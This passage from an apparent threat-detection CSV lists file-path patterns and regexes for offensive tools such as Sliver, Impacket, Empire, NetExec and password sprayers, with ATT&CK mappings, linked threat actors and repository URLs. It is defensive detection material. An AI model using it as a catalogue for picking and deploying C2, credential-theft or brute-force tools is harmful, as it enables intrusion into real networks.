It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","11322" "*/slinky.py*",".{0,1000}\/slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11323" "*/SlinkyCat.git*",".{0,1000}\/SlinkyCat\.git.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","11324" "*/slip.git",".{0,1000}\/slip\.git","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","11325" "*/slip-main.zip",".{0,1000}\/slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","1","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","11326" "*/sliver.db-journal*",".{0,1000}\/sliver\.db\-journal.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","11327" 
"*/sliver.exe*",".{0,1000}\/sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11328" "*/sliver.git*",".{0,1000}\/sliver\.git.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11329" "*/sliver.pb.go*",".{0,1000}\/sliver\.pb\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11330" "*/sliver.proto*",".{0,1000}\/sliver\.proto.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source 
cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11331" "*/sliver/evasion/*",".{0,1000}\/sliver\/evasion\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11332" "*/sliver_pb2.py*",".{0,1000}\/sliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11333" "*/sliver_pb2_grpc.py*",".{0,1000}\/sliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11334" "*/sliver-client*",".{0,1000}\/sliver\-client.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source 
cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#linux","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","11335" "*/sliver-client.exe*",".{0,1000}\/sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11336" "*/sliver-client_linux*",".{0,1000}\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11337" "*/sliver-client_linux.sig*",".{0,1000}\/sliver\-client_linux\.sig.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11338" "*/sliver-client_windows.exe*",".{0,1000}\/sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11339" "*/sliver-client_windows-386*.exe*",".{0,1000}\/sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11340" "*/sliver-client_windows-amd64*.exe*",".{0,1000}\/sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11341" "*/sliver-client_windows-arm64*.exe*",".{0,1000}\/sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11342" "*/sliverpb.Exe*",".{0,1000}\/sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11343" "*/sliver-server*",".{0,1000}\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11344" "*/sliver-server_linux*",".{0,1000}\/sliver\-server_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11345" "*/SlowPathMITM.py*",".{0,1000}\/SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","11346" "*/SmallSecretsDump.py*",".{0,1000}\/SmallSecretsDump\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","11347" "*/smartbrute.git*",".{0,1000}\/smartbrute\.git.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","11348" "*/smartbrute-main*",".{0,1000}\/smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#linux","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","11349" "*/smb.py*",".{0,1000}\/smb\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11350" "*/smb/psexec.rb*",".{0,1000}\/smb\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11351" "*/SMB_RPC/*.py",".{0,1000}\/SMB_RPC\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11352" "*/smb2-capabilities.nse*",".{0,1000}\/smb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11353" "*/smb2-security-mode.nse*",".{0,1000}\/smb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11354" "*/smb2-time.nse*",".{0,1000}\/smb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11355" "*/smb2-vuln-uptime.nse*",".{0,1000}\/smb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11356" "*/smb3.py*",".{0,1000}\/smb3\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11357" "*/smb-brute.nse*",".{0,1000}\/smb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11358" "*/smbclient.exe*",".{0,1000}\/smbclient\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","risk of false positives","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11359" "*/smbclient.py*",".{0,1000}\/smbclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11360" "*/smb-cmds.txt*",".{0,1000}\/smb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","11361" "*/SMBCrunch.git*",".{0,1000}\/SMBCrunch\.git.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11362" "*/smb-double-pulsar-backdoor.nse*",".{0,1000}\/smb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
